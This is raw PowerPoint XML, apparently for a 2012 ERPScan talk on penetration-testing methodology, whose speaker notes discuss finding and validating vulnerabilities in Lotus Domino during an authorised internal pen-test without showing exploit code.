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9" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId41"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId42"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="262" r:id="rId3"/>
    <p:sldId id="279" r:id="rId4"/>
    <p:sldId id="280" r:id="rId5"/>
    <p:sldId id="281" r:id="rId6"/>
    <p:sldId id="282" r:id="rId7"/>
    <p:sldId id="283" r:id="rId8"/>
    <p:sldId id="288" r:id="rId9"/>
    <p:sldId id="287" r:id="rId10"/>
    <p:sldId id="289" r:id="rId11"/>
    <p:sldId id="290" r:id="rId12"/>
    <p:sldId id="291" r:id="rId13"/>
    <p:sldId id="293"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10" r:id="rId29"/>
    <p:sldId id="311" r:id="rId30"/>
    <p:sldId id="322" r:id="rId31"/>
    <p:sldId id="323" r:id="rId32"/>
    <p:sldId id="315" r:id="rId33"/>
    <p:sldId id="316" r:id="rId34"/>
    <p:sldId id="317" r:id="rId35"/>
    <p:sldId id="318" r:id="rId36"/>
    <p:sldId id="320" r:id="rId37"/>
    <p:sldId id="321" r:id="rId38"/>
    <p:sldId id="319" r:id="rId39"/>
    <p:sldId id="274" r:id="rId4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816"/>
    <a:srgbClr val="F47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05" autoAdjust="0"/>
    <p:restoredTop sz="94316" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="-1812" y="-10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6DEF41-83F2-442A-8AB1-F50805E041FA}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>30.03.2012</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EC562C-5922-4352-A2BF-AE4489DB2947}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1808512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4F37BD-F56B-4A0A-86EF-799D34BC16F1}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>30.03.2012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EC4264-CED8-4F10-9937-B0D2542C4C4D}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48479706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073631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8977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check all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> dangerous bugs. The first pack of bugs really dangerous. Last one is less dangerous but also - no public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. Of can buy private exploits, or may be we already have framework with commercial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. But before run anything we should be sure that customer knows about risks. In our case Customer do not want any risky tests, because this server was too important for him. So usually in this case pen-tester just doing paper work - write about problem in report, describes risks, describes why he was not able to exploit it and do not forget about solutions and recommendation in the report.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2800988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Of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> course there are some negative… But some bugs are hard to exploit in our environment and also there is risk of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. BTW we have many other targets and custom services the we should check. So this situation with pen-tests I have meet too often (in Russia).  I understand that it is depends from level of pen-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>tetser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and level of customer. But with same thinking we not a researchers.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4145411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back to pen-tester’s tasks. So, we found few </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. We make analyses for them and was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>tring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to find any exploits. But it is not enough. Every good pen-testers will make more deep research.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3544043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back to the bugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>list.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Okay, first pack of bugs I can research and create en exploit right now, because it takes too much time for research (details not in public) and also there still risk, that exploit will not work and crash the service. But except buffers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>erorrors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> there is one auth. bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, that can not crash service just by class. Of course we have not exploit or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. But we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>shoud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> check all information about this bug… let’s go to the advisory that was published by ZDI.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3045787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778063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2A4CC9D-D039-41A3-AD02-F21EB2512E8B}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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ru-RU" smtClean="0"/>
              <a:t>Тут скриншот</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8DA10C7-1AA0-490D-B8F8-B16A620EE57B}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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smtClean="0"/>
              <a:t>I work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> as penetration tester at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ERPscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> company. Also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>I’am</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> trying to get fun from researching and bug-hunting at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>DsecRG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>writie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> articles for the Russian offline magazine that called HACKER.  And at end of the story about myself, I want to say that me and my Russian friends was created first Russian DCG group. It was really interesting experience for me. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"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Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> test includes many sub-tasks and challenges, it is really interesting job. Of course there is more high-level stuff, but most interesting part (for me) is on low-level. There is not all sub-tasks, bit it is does not matter, because we will talk just about finding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, it’s validation and exploitation. Every penetration-tester in the world must solve this tasks to get result. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>According to pen-tester solves these problems, we can talk about the quality of work. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167163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Okay, so let’s take a look into methods, that any bug-hunter may use. Again,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> there </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>are listed not all possible methods, but</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> they </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>are common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and they are really works. Of course sometimes you can find bug just by reading documentation. The question is - are all this methods possible for pen-tester? And when he will use it and when not?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="976402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Before we can get answer, we need to understand, that pen-tester is very unhappy man 8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The main task is show to the customer weak elements of his infrastructures and show, how it can be hacked, why it can hacked and why something that must save it from hacking - does not work, and finally, what hacker can get from customer’s system... And, of course solutions and recommendations. But he have not enough time for all targets and this targets can be very different by type. Of course it is not a customer’s problem - it is the problem for a company that provide penetration test. There are some pen-test standards, the may help, but their not give answer to our question. Okay, let’s back to the bug-hunter’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>metods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196798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How</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a pen-tester can find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in this environment? Interesting things, that in most cases pen-tester usually have deals with two type of targets - custom or well-know. And if we talk about well-known (Lotus is well-know), than we can’t use SCR. Of course if we have deal with open-source it is possible. But what about RE and FUZ? If talk about well-known targets in most cases this methods will be excluded!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So, if some popular software is  in the scope, then there is a big % that pen tester JUST look into CVE-list  and if  no problems will found (fully patched) then he will not try to hack it (it is to expensive to find new 0day in Apache, VMware and IBM products while you do JUST pen-test). </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3243124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May be it’s right.  Because pen-tester trust to this vendor and understand, that before him there was many other researchers that already found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> few bugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. But</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> something tell me that it is not always right. That’s why in reports we write about “coverage”. What we have done against every target… and why. What methods was using. Not just report about bugs. Also the same things not only with finding. Exploitations is important too, because sometimes we do not exploit things for different reasons.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3298171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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> think there are enough words in general, let’s talk about Lotus. It was internal pen-test and  we have found in the scope several installation of Lotus Domino. It is pretty popular and useful business system and of course we want to hack it.. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360318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first case we will talk about version 8.5.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> with Fix pack 2. It was not latest version (the latest version was 8.5.3 on those moment) And now we need to find vulnerabilities and exploits for available services, because it is popular well-known software. In most cases any vulnerabilities scanner can do that for you. But let’s do it by hand. Just let’s go to exploit-db.com…</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242390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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Нижний колонтитул 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="4205288"/>
            <a:ext cx="1295400" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:body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D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Нижний колонтитул 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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6" name="Номер слайда 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Нижний колонтитул 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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6" name="Номер слайда 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Нижний колонтитул 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ERPScan — invest in security to secure investments</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Номер слайда 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="D:\My Dropbox\Projects\SAPScan\_PRESS\_presentation\erpscan-cover.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10" name="Заголовок 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285720" y="2922364"/>
            <a:ext cx="4357718" cy="3578470"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8790"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFC000"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="FA9816"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="2700000" scaled="0"/>
          </a:gradFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="90000" bIns="90000" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3500" b="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Название презентации пишем здесь</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Иван Иванович,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>агент ЦРУ</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285720" y="1659427"/>
            <a:ext cx="3929090" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to secure investments</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2200" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Нижний колонтитул 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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5" name="Номер слайда 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214282" y="1142984"/>
            <a:ext cx="8715436" cy="5072098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Текст</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Текст</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Текст</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Текст</a:t>
            </a:r>
          </a:p>
          <a:p>
